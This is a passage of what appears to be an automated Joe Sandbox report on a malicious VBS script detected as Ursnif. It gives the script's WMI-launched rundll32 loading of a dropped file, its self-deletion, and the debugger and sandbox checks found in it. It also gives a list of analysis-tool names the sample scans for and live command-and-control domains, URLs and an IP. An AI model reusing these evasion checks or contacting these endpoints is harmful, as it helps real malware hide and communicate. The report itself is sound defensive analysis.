exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70332210 push ecx; ret	23_2_70332219
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70332263 push ecx; ret	23_2_70332273
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C27AB0 push ecx; ret	23_2_00C27AB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_00C27E1F push ecx; ret	23_2_00C27E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70357A3C push ds; iretd	23_2_70357A42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7035922C push edi; ret	23_2_7035922E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70354A03 push ds; retf 0000h	23_2_70354A05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_703562A0 push es; ret	23_2_703562B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70359301 push ebp; ret	23_2_70359304
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70356B54 pushfd ; iretd	23_2_70356B55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70357CF3 push ecx; retf	23_2_70357CF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7035856E push ebp; retf	23_2_7035856F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70349D56 push esp; retf	23_2_70349D57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70349758 push esp; retf	23_2_70349760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7038FF41 push ss; ret	23_2_7038FF5B

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress,

23_2_70331A0A

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Jump to dropped file

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Temp\fum.cpp

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Deletes itself after installation

Show sources

Source: C:\Windows\System32\wscript.exe

File deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbs

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmp	Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: FORTITRACER.EXEA

Found evasive API chain (may stop execution after checking system information)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep

graph_23-14388

Source: C:\Windows\System32\wscript.exe TID: 4084

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_23-14795

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_7034AC85 FindFirstFileExW,

23_2_7034AC85

Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging:

Found API chain indicative of debugger detection

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

graph_23-14388

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

23_2_70340D8D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress,

23_2_70331A0A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_703483FA GetProcessHeap,

23_2_703483FA

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h]	23_2_7034A97E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_70342485 mov eax, dword ptr fs:[00000030h]	23_2_70342485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h]	23_2_7038F0B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7038EBE6 push dword ptr fs:[00000030h]	23_2_7038EBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h]	23_2_7038EFDF

Source: C:\Windows\System32\wbem\WmiPrvSE.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

23_2_70340D8D

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: fum.cpp.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.251.90.253 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: pop.urlovedstuff.com

Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	23_2_703311BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	23_2_7034E0ED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	23_2_7034E213
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	23_2_7034DA85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	23_2_7034E319
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	23_2_7034E3E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	23_2_70344CAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	23_2_7034DD27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	23_2_7034DD86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	23_2_7034DE0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	23_2_7034DE9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,	23_2_7034DF36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	23_2_703447E8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_00C26CD6 cpuid

23_2_00C26CD6

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

23_2_703310ED

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

23_2_70331F7C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

23_2_00C26CD6

Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp	Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation221	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scripting121	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Scripting121	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API12	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution1	Logon Script (Mac)	Logon Script (Mac)	File Deletion1	NTDS	System Information Discovery145	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion13	Cached Domain Credentials	Security Software Discovery351	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection12	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
start[2021.09.09_15-26].vbs	10%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\fum.cpp	13%	ReversingLabs	Win32.Worm.Cridex

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
23.2.rundll32.exe.c20000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

Source	Detection	Scanner	Label	Link
pop.urlovedstuff.com	9%	Virustotal		Browse
atl.bigbigpoppa.com	9%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://atl.bigbigpoppa.com/	100%	Avira URL Cloud	malware
http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2	100%	Avira URL Cloud	malware
http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT	100%	Avira URL Cloud	malware
http://pop.bigbigpoppa.com/	100%	Avira URL Cloud	malware
http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c	100%	Avira URL Cloud	malware
http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pop.urlovedstuff.com	185.251.90.253	true	true	9%, Virustotal, Browse	unknown
atl.bigbigpoppa.com	185.251.90.253	true	true	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://atl.bigbigpoppa.com/	rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT	rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://pop.bigbigpoppa.com/	rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp	true	Avira URL Cloud: malware	unknown
http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c	rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d	rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.251.90.253	pop.urlovedstuff.com	Russian Federation		35278	SPRINTHOSTRU	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	481181
Start date:	10.09.2021
Start time:	13:48:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	start[2021.09.09_15-26].vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@7/2@4/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 21.2% (good quality ratio 20.6%) Quality average: 80.8% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 71% Number of executed functions: 49 Number of non-executed functions: 86
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated
